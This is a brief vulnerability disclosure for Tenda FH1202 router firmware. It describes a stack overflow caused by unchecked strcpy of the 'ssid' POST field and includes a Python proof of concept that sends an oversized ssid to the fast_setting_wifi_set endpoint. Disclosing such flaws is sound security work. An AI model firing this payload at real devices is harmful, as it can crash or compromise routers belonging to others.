- Firmware download website: https://www.tenda.com.cn/download/detail-2079.html
FH1202 V1.2.0.14(408)
The Tenda FH1202 V1.2.0.14(408) firmware has a stack overflow vulnerability in the form_fast_setting_wifi_set
function. The src
variable receives the ssid
parameter from a POST request and is later assigned to the v7
and v8
variable, which is fixed at 64 bytes. However, since the user can control the input of ssid
, the statement strcpy(v7, src);
and strcpy(v8, src);
can cause a buffer overflow. The user-provided ssid
can exceed the capacity of the v7
and v8
array, triggering this security vulnerability.
import requests
ip = '192.168.84.101'
url = f'http://{ip}/goform/fast_setting_wifi_set'
payload = {
'ssid': 'a' * 1000
}
r = requests.post(url=url, data=payload)
print(r.content)